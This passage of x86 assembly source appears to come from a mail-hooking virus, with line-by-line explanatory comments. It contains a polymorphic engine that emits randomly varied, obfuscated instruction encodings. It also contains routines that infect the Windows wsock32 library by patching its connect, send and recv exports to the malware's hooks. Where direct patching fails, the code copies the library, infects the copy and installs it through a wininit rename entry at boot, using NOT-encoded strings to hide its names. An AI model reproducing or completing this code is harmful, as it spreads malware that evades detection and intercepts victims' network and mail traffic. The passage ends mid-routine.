
;-----------------------------------------------------------------------
; bmovrr - emit a register-to-register move using one of two byte
;          patterns chosen at random (polymorphic "mov dst,src").
; In:    al = source register, ah = destination register (roles follow
;        _movrr0/_movrr1, which this tail-jumps to), edi = output pointer
; Out:   tail-jump to _movrr0 (direct 8Bh /r) or _movrr1 (push/pop pair)
; Calls: rnd (not on this page) - appears to take its bound on the stack,
;        pop it itself, and return the draw in eax (eax is saved around it)
;-----------------------------------------------------------------------
bmovrr:
        push    eax                     ; rnd clobbers eax; keep the operands
        push    dword 2
        call    rnd                     ; two-way coin flip
        cmp     al,0
        jne     _bmovrr0
        pop     eax
        jmp    _movrr0                  ; variant 0: 8B /r encoding
_bmovrr0:
        pop     eax
        jmp    _movrr1                  ; variant 1: push src / pop dst
        
; freeReg - mark register index eax as available in the `registers`
;           allocation table and bump the free-register count `freer`.
; In: eax = register number (byte index into registers[])
freeReg:
        mov     byte [eax+registers],0  ; 0 = free
        inc     byte [freer]
        ret
; getFreeReg - draw a random register index (rnd(7); 0..6 if rnd returns
;              0..n-1), retry until it is free, mark it busy, decrement `freer`.
; Out:  eax = register number
; Note: spins forever if all seven slots are busy - callers gate this on
;       [freer] != 0 (see cmovri).
getFreeReg:
        push    dword 7
        call    rnd
        cmp     byte [eax+registers],0
        jne     getFreeReg              ; busy -> draw again
        mov     byte [eax+registers],1  ; 1 = busy
        dec     byte [freer]
        ret
;-----------------------------------------------------------------------
; cmovri - emit code that loads a 32-bit constant into a register, with
;          the constant randomly obfuscated ("complex mov reg,imm").
; In:    al = destination register, edx = immediate, edi = output pointer
; Variant chosen by rnd(3):
;   0: bmovri            - one of three direct encodings, no obfuscation
;   1: via scratch reg   - if [freer] != 0: cmovri scratch,imm (recursive),
;                          then mov dst,scratch (cmovrr, not on this page);
;                          otherwise falls back to bmovri
;   2: split constant    - pick random r, emit cmovri dst,(imm + r)
;                          (recursive), then baddsub dst,r (sub dst,r or
;                          add dst,-r), so dst == imm at runtime
; Variants 1 and 2 recurse; termination is probabilistic (each level has
; a 1/3 chance of variant 0), so nesting depth is unbounded in principle.
; Clobbers: eax, ecx, edx, flags, plus whatever rnd/getFreeReg clobber.
;-----------------------------------------------------------------------
cmovri:
        push    eax
        push    edx
        push    dword 3
        call    rnd
        cmp     al,0
        jne     _cmovri0
        pop     edx
        pop     eax
        jmp     bmovri                  ; variant 0: direct encoding
_cmovri0:
        cmp     al,1
        jne     _cmovri1
        pop     edx
        pop     eax
        cmp     byte [freer],0
        je      bmovri                  ; no scratch register free -> variant 0
        push    eax                     ; save destination register
        push    edx                     ; save immediate
        call    getFreeReg              ; eax = scratch register, now marked busy
        pop     edx
        push    eax                     ; save scratch register
        push    edx
        call    cmovri                  ; recursive: load imm into scratch
        pop     edx
        pop     eax                     ; eax = scratch register
        mov     dl,al
        call    freeReg                 ; release scratch (its code is already emitted)
        pop     eax                     ; eax = destination register
        xchg    al,ah                   ; ah = destination
        mov     al,dl                   ; al = scratch (source)
        jmp     cmovrr                  ; emit mov dst,scratch (cmovrr not shown here)
_cmovri1:
        push    dword -1
        call    rnd                     ; r1 = full 32-bit draw
        or      eax,eax
        jz      _cmovri1                ; reject zero
        test    eax,17                  ; bits 0 and 4 of r1 decide whether to mix in a 2nd draw
        jz      _cmovri1c
        push    eax
_cmovri1b:
        push    dword -1
        call    rnd                     ; r2 = second nonzero draw
        or      eax,eax
        jz      _cmovri1b
        rol     eax,16
        pop     edx                     ; edx = r1
        adc     eax,edx                 ; r = rol(r2,16) + r1 + CF (CF from the rol)
_cmovri1c:
        pop     edx                     ; edx = original immediate
        add     edx,eax                 ; edx = imm + r
        pop     ecx                     ; ecx = destination register (saved eax)
        push    eax                     ; save r
        push    ecx                     ; save destination
        mov     eax,ecx
        call    cmovri                  ; recursive: emit dst = imm + r
        pop     eax                     ; al = destination register
        pop     edx                     ; edx = r
        jmp     near baddsub            ; emit sub dst,r  (or add dst,-r)

; bmovri - emit "mov reg,imm32" as one of three equivalent byte patterns,
;          chosen by rnd(3):
;            0: _movri0  lea reg,[imm32]        8D 05+reg*8 imm32
;            1: _movri1  mov reg,imm32          B8+reg imm32
;            2: _movri2  push imm32 / pop reg   68 imm32, 58+reg
; In: al = destination register, edx = immediate, edi = output pointer
; eax/edx are preserved across the rnd call and handed to the emitter.
bmovri:
        push    eax
        push    edx
        push    dword 3
        call    rnd
        cmp     al,0
        jne     _bmovri0
        pop     edx
        pop     eax
        jmp    _movri0
_bmovri0:
        cmp     al,1
        jne     _bmovri1
        pop     edx
        pop     eax
        jmp    _movri1
_bmovri1:
        pop     edx
        pop     eax
        jmp    _movri2

; _movrr0 - emit "mov dst,src" as 8Bh /r (MOV r32,r/m32):
;           ModRM = 11 | ah<<3 (reg = dst) | al (r/m = src).
;           Emits nothing when dst == src.
; In: al = source register, ah = destination register, edi = output pointer
_movrr0:
        cmp     ah,al
        je      __movrr00               ; same register: nothing to do
        shl     ah,3                    ; reg field = destination
        or      ah,al                   ; r/m field = source
        or      ah,0c0h                 ; mod = 11 (register direct)
        mov     al,8bh                  ; opcode
        stosw                           ; writes 8Bh, then the ModRM byte
__movrr00:
        ret
; _movrr1 - emit "mov dst,src" as the pair "push src / pop dst".
;           Emits nothing when dst == src.
; In: al = source register, ah = destination register, edi = output pointer
_movrr1:
        cmp     ah,al
        je      __movrr10
        call    _pushr                  ; push src   (50h+al)
        xchg    al,ah
        call    _popr                   ; pop dst    (58h+reg)
__movrr10:
        ret

; _movri0 - emit "lea reg,[imm32]": 8D, ModRM = 00 reg 101 ([disp32], no
;           base register), disp32 = constant. In flat 32-bit mode this
;           loads the constant itself (no memory access), so it is a
;           differently-shaped "mov reg,imm32".
; In: al = register, edx = immediate, edi = output pointer
_movri0:
        shl     al,3                    ; reg field
        or      al,5                    ; mod=00, r/m=101 -> [disp32]
        mov     ah,8dh
        xchg    al,ah                   ; al = opcode 8Dh, ah = ModRM
        stosw
        mov     eax,edx
        stosd                           ; disp32 = the constant
        ret
; _movri1 - emit the plain "mov reg,imm32": B8+reg imm32.
; In: al = register, edx = immediate, edi = output pointer
_movri1:
        add     al,0b8h                 ; B8h + reg
        stosb
        mov     eax,edx
        stosd                           ; imm32
        ret
; _movri2 - emit "push imm32 / pop reg" (68 imm32, 58h+reg).
; In: al = register, edx = immediate, edi = output pointer
_movri2:
        push    eax                     ; _pushi only reads edx; keep the register number
        call    _pushi
        pop     eax
        call    _popr
        ret

; _addri - emit "add reg,imm32".
;   reg == EAX (al == 0): 05 imm32          (short accumulator form)
;   otherwise:            81 C0+reg imm32   (81 /0)
; In: al = register, edx = immediate, edi = output pointer
_addri:
        or      al,al
        jnz     __addri0
        mov     al,05h                  ; add eax,imm32
        stosb
        jmp     __addri1
__addri0:
        push    eax
        mov     al,081h
        stosb
        pop     eax
        add     al,0c0h                 ; ModRM: mod=11, reg=000 (ADD), r/m=reg
        stosb
__addri1:
        mov     eax,edx
        stosd                           ; imm32
        ret

; _subri - emit "sub reg,imm32".
;   reg == EAX (al == 0): 2D imm32          (short accumulator form)
;   otherwise:            81 E8+reg imm32   (81 /5)
; In: al = register, edx = immediate, edi = output pointer
_subri:
        or      al,al
        jnz     __subri0
        mov     al,2dh                  ; sub eax,imm32
        stosb
        jmp     __subri1
__subri0:
        push    eax
        mov     al,081h
        stosb
        pop     eax
        add     al,0e8h                 ; ModRM: mod=11, reg=101 (SUB), r/m=reg
        stosb
__subri1:
        mov     eax,edx
        stosd                           ; imm32
        ret

; _pushr - emit "push reg" (one byte, 50h+reg).
; In: al = register, edi = output pointer
_pushr:
        add     al,050h
        stosb
        ret

; _popr - emit "pop reg" (one byte, 58h+reg).
; In: al = register, edi = output pointer
_popr:
        add     al,058h
        stosb
        ret

; _pushi - emit "push imm32" (68h imm32).
; In: edx = immediate, edi = output pointer. Clobbers eax.
_pushi:
        mov     al,068h
        stosb
        mov     eax,edx
        stosd                           ; imm32
        ret

; baddsub - emit "reg -= imm" in one of two equivalent forms chosen by rnd(2):
;   0: sub reg,imm32
;   1: add reg,-imm32   (two's complement of edx via not/inc)
; In: al = register, edx = immediate, edi = output pointer
baddsub:
        push    eax
        push    edx
        push    dword 2
        call    rnd
        cmp     al,0
        jne     _baddsub0
        pop     edx
        pop     eax
        jmp     _subri                  ; variant 0: sub reg,imm
_baddsub0:
        pop     edx
        pop     eax
        not     edx
        inc     edx                     ; edx = -imm
        jmp     _addri                  ; variant 1: add reg,-imm

; _orrr - emit "or reg,reg" (09h /r with reg field == r/m field): a filler
;         instruction that changes only flags.
; In: al = register (0..7), edi = output pointer. Clobbers cl, eax.
; ModRM = C0h + reg*9 = C0h | reg<<3 | reg; for reg <= 7 the mul leaves ah = 0.
_orrr:
        mov     cl,9
        mul     cl                      ; ax = al * 9  (= reg<<3 | reg for reg < 8)
        add     al,0c0h                 ; mod = 11
        mov     ah,09h
        xchg    ah,al                   ; al = opcode 09h, ah = ModRM
        stosw
        ret

; _addmri - emit "add byte/word [reg],imm" (memory operand, base register al).
; In:  al = base register (compared with _EBP, defined elsewhere), dx = immediate,
;      edi = output pointer
; Operand size is derived from the immediate, not from a caller parameter:
;   dh != 0 -> 66h prefix, opcode 81h, imm16
;   dh == 0 -> opcode 80h, imm8 (dl)
; ModRM reg field = 000 (ADD). mod=00 r/m=101 would mean [disp32], so for
; EBP the ModRM is 45h (mod=01, [ebp+disp8]) followed by disp8 = 0.
; r/m=100 (ESP) would need a SIB byte; no such case is handled here.
_addmri:
        mov     ah,1
        test    dh,0ffh
        jz      __addmri8
        push    eax
        mov     al,66h                  ; operand-size prefix for the 16-bit form
        stosb
        pop     eax
        inc     ah                      ; ah = 2 -> opcode 81h after the dec below
__addmri8:
        dec     ah                      ; ah = 0 (80h, imm8) or 1 (81h, imm16)
        cmp     al,_EBP
        jne     __addmriNOEBP
        mov     al,45h                  ; ModRM: mod=01 reg=000 r/m=101 -> [ebp+disp8]
        add     ah,80h                  ; opcode 80h / 81h
        xchg    al,ah
        stosw                           ; opcode, ModRM
        mov     al,00
        stosb                           ; disp8 = 0
        jmp     __addmri0
__addmriNOEBP:
        add     ah,80h                  ; opcode 80h / 81h
        xchg    al,ah
        stosw                           ; opcode, ModRM = 00 000 reg -> [reg]
__addmri0:
        test    dh,0ffh
        jz      __addmri8b
        mov     ax,dx
        stosw                           ; imm16
        ret
__addmri8b:
        mov     al,dl
        stosb                           ; imm8
        ret

; _submri - emit "sub byte/word [reg],imm" (memory operand, base register al).
; In:  al = base register (compared with _EBP, defined elsewhere), dx = immediate,
;      edi = output pointer
; Same shape as _addmri: dh != 0 -> 66h 81h imm16, dh == 0 -> 80h imm8.
; ModRM reg field = 101 (SUB): 6Dh for EBP (mod=01, [ebp+disp8], disp8 = 0),
; otherwise 28h + reg (mod=00, [reg]). r/m=100 (ESP) is not handled.
_submri:
        mov     ah,1
        test    dh,0ffh
        jz      __submri8
        push    eax
        mov     al,66h                  ; operand-size prefix for the 16-bit form
        stosb
        pop     eax
        inc     ah                      ; ah = 2 -> opcode 81h after the dec below
__submri8:
        dec     ah                      ; ah = 0 (80h, imm8) or 1 (81h, imm16)
        cmp     al,_EBP
        jne     __submriNOEBP
        mov     al,6dh                  ; ModRM: mod=01 reg=101 r/m=101 -> [ebp+disp8]
        add     ah,80h                  ; opcode 80h / 81h
        xchg    al,ah
        stosw                           ; opcode, ModRM
        mov     al,00
        stosb                           ; disp8 = 0
        jmp     __submri0
__submriNOEBP:
        add     ah,80h                  ; opcode 80h / 81h
        add     al,28h                  ; ModRM: mod=00 reg=101 (SUB) r/m=reg
        xchg    al,ah
        stosw                           ; opcode, ModRM
__submri0:
        test    dh,0ffh
        jz      __submri8b
        mov     ax,dx
        stosw                           ; imm16
        ret
__submri8b:
        mov     al,dl
        stosb                           ; imm8
        ret

; - poly.inc EOF -
; - wsock.inc BOF -

[extern CreateFileA]
[extern CloseHandle]
[extern GetFileSize]
[extern CreateFileMappingA]
[extern MapViewOfFile]
[extern UnmapViewOfFile]
[extern GetSystemDirectoryA]
[extern GetWindowsDirectoryA]
[extern CopyFileA]
[extern lstrcat]
[extern DeleteFileA]

;-----------------------------------------------------------------------
; installMailHook - get the patched wsock32 library (see infectws, which
;   rewrites the 'conn'/'send'/'recv' exports; its body runs past this
;   page) installed on the system. Two stages are visible here:
;     1. build "<system dir>" + wsock32dll in a stack buffer and run
;        infectws on that file; if [hkey] is nonzero afterwards, done.
;     2. wininitStuff: copy the library under a second name, infect the
;        copy, and write "<header><path...l>=<path...'_'>" to a file in
;        the Windows directory named by `wininit`. The write sequence is
;        consistent with a wininit.ini [rename] entry (destination=source)
;        applied at next boot, but the string data is not on this page.
;   Strings (fmaskall, wsock32dll, wininitstr, wininit) are stored bitwise
;   inverted and decoded in place with NOT; only the first 8 (or 4) bytes
;   of each are touched here, so anything beyond that is plaintext.
;   Frame: 260 bytes of locals. ebp is repointed at the buffer start and
;   used as the buffer pointer; the real frame pointer is saved on the
;   stack at entry and restored by every exit path.
;   In wininitStuff the buffer is split into buf1 = ebp (128) and
;   buf2 = ebp+128 (128); the global [fHnd] is reused as the buf2 pointer.
;   No length checks anywhere: lstrcat appends onto 260-/128-byte buffers.
;   Returns nothing meaningful; failures just return.
;-----------------------------------------------------------------------
installMailHook:
        push    ebp
        mov     ebp,esp
        sub     esp,260                 ; 260-byte path buffer
        push    ebp                     ; save the real frame pointer
        sub     ebp,260                 ; ebp -> start of the buffer

        not     dword [fmaskall]        ; decode/toggle; meaning not visible on this page
        call    scansubject             ; not on this page

        not     dword [wsock32dll]      ; decode first 8 bytes of the library name
        not     dword [wsock32dll+4]

        push    dword 260
        push    ebp
        call    GetSystemDirectoryA     ; buf = "<sysdir>"
        or      eax,eax
        jz      unableToHookMail        ; 0 = failure

        push    dword wsock32dll
        push    ebp
        call    lstrcat                 ; buf += wsock32dll (no bounds check)

        mov     esi,ebp
        call    infectws                ; try to patch the live file; sets [hkey]

        mov     al,byte [hkey]
        or      al,al
        jz      wininitStuff            ; direct patch failed -> copy-and-rename fallback

unableToHookMail:
        pop     ebp                     ; restore the real frame pointer
        leave
        ret        

wininitStuff:
        not     dword [wininitstr]      ; decode first 8 bytes of the ini text
        not     dword [wininitstr+4]
        not     dword [wininit]         ; decode first 4 bytes of the ini file name

        push    dword 128
        push    ebp
        call    GetSystemDirectoryA     ; buf1 (ebp) = "<sysdir>"
        or      eax,eax
        jz      unableToHookMail

        push    dword 128
        mov     esi,ebp
        add     esi,128
        mov     [fHnd],esi              ; [fHnd] doubles as the buf2 pointer (ebp+128)
        push    esi
        call    GetSystemDirectoryA     ; buf2 = "<sysdir>"
        or      eax,eax
        jz      unableToHookMail

        push    dword wsock32dllp
        push    dword [fHnd]
        call    lstrcat                 ; buf2 += wsock32dllp (the existing library)

        mov     byte [wsock32dll+10],'_'   ; patch one byte of the decoded name; how this
                                           ; alters the text wsock32dllp points at depends on
                                           ; data layout not visible here
        push    dword wsock32dllp
        push    ebp
        call    lstrcat                 ; buf1 += wsock32dllp (the copy's name)

        push    dword 1                 ; bFailIfExists
        push    ebp                     ; lpNewFileName      = buf1
        push    dword [fHnd]            ; lpExistingFileName = buf2
        call    CopyFileA
        or      eax,eax
        jz      near unableToAddWininit

        push    dword [fHnd]            ; infectws overwrites [fHnd] with a file handle
        mov     esi,ebp
        call    infectws                ; infect the copy (buf1)
        pop     dword [fHnd]            ; restore the buf2 pointer

        mov     al,byte [hkey]
        or      al,al
        jz      near unableToAddWininitPanic   ; copy not infected -> delete it

        push    dword 128
        push    dword [fHnd]
        call    GetWindowsDirectoryA    ; buf2 = "<windir>"
        or      eax,eax
        jz      near unableToAddWininit

        push    dword wininit
        push    dword [fHnd]
        call    lstrcat                 ; buf2 += wininit (target ini file name)

        push    dword 0                 ; hTemplateFile
        push    dword 80h               ; FILE_ATTRIBUTE_NORMAL
        push    dword 2h                ; CREATE_ALWAYS: an existing file is truncated
        push    dword 0                 ; lpSecurityAttributes
        push    dword 0                 ; dwShareMode
        push    dword 40000000h         ; GENERIC_WRITE
        push    dword [fHnd]            ; lpFileName = buf2
        call    CreateFileA
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) -> 0
        jz      near unableToAddWininit
        dec     eax

        push    eax                     ; keep the file handle
        push    dword 0                 ; lpOverlapped
        push    dword localtime         ; lpNumberOfBytesWritten (scratch dword)
        push    dword wininitstrLen
        push    dword wininitstr
        push    eax
        call    WriteFile               ; write 1: decoded header text

        mov     esi,ebp
        xor     ecx,ecx
strsizeLoop:
        lodsb
        inc     ecx
        or      al,al
        jnz     strsizeLoop             ; ecx = strlen(buf1)+1, esi -> just past the NUL
        dec     ecx                     ; ecx = strlen(buf1)

        mov     byte [esi-2],'l'        ; last character of buf1 := 'l'

        pop     eax                     ; file handle
        push    ecx
        push    esi
        push    eax
        push    dword 0
        push    dword localtime
        push    ecx
        push    ebp
        push    eax
        call    WriteFile               ; write 2: buf1 ending in 'l'

        mov     eax,[esp]               ; file handle (still on top of the stack)
        mov     byte [wininitstr],'='
        push    dword 0
        push    dword localtime
        push    dword 1
        push    dword wininitstr
        push    eax
        call    WriteFile               ; write 3: a single '='

        pop     eax                     ; file handle
        pop     esi
        pop     ecx
        push    eax                     ; left on the stack as CloseHandle's argument

        mov     byte [esi-2],'_'        ; last character of buf1 := '_'
        push    dword 0
        push    dword localtime
        push    ecx
        push    ebp
        push    eax
        call    WriteFile               ; write 4: buf1 ending in '_'
                                        ; net: "<header><path..l>=<path.._>" (destination=source)

        call    CloseHandle             ; consumes the handle pushed above

unableToAddWininit:
        pop     ebp                     ; restore the real frame pointer
        leave
        ret

unableToAddWininitPanic:
        push    ebp
        call    DeleteFileA             ; remove the copy that could not be infected (buf1)

        jmp     unableToAddWininit


infectws:
        mov     byte [hkey],0

        push    dword 0
        push    dword 80h
        push    dword 3
        push    dword 0
        push    dword 0
        push    dword (80000000h | 40000000h)
        push    esi
        call    CreateFileA
        inc     eax
        jz      near infwsError
        dec     eax

        mov     [fHnd],eax

        push    dword 0
        push    eax
        call    GetFileSize
        inc     eax
        jz      near infwsErrorClose
        dec     eax

        mov     [fileSize],eax

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    dword 4
        push    eax
        push    dword [fHnd]
        call    CreateFileMappingA
        or      eax,eax
        jz      near infwsErrorClose

        mov     dword [fhmap],eax

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    dword 6
        push    dword [fhmap]
        call    MapViewOfFile
        or      eax,eax
        jz      near infwsErrorCloseMap

        mov     [mapMem],eax

        mov     edi,eax
        cmp     word [edi],'MZ'
        jne     near infwsErrorCloseUnmap

        add     edi,[edi+3ch]
        cmp     word [edi],'PE'
        jne     near infwsErrorCloseUnmap

        mov     esi,edi
        mov     eax,18h
        add     ax,[edi+14h]
        add     edi,eax

        mov     cx,[esi+06h]
        dec     cx
        mov     eax,28h
        mul     cx
        add     edi,eax

        mov     ecx,[edi+14h]
        add     ecx,[edi+10h]

        cmp     ecx,[fileSize]
        jne     near infwsErrorCloseUnmap

        mov     ebx,[edi+0ch]
        add     ebx,[edi+10h]
        mov     eax,[esi+34h]
        mov     [_wsockhookbase],ebx
        add     [_wsockhookbase],eax
        mov     eax,~'conn'
        not     eax
        call    patchAPI
        jc      near infwsErrorCloseUnmap
        add     eax,[esi+34h]
        mov     [_connect],eax

        add     ebx,my_send-my_connect
        mov     eax,~'send'
        not     eax
        call    patchAPI
        jc      near infwsErrorCloseUnmap
        add     eax,[esi+34h]
        mov     [_send],eax

        xor     ebx,ebx
        mov     eax,~'recv'
        not     eax
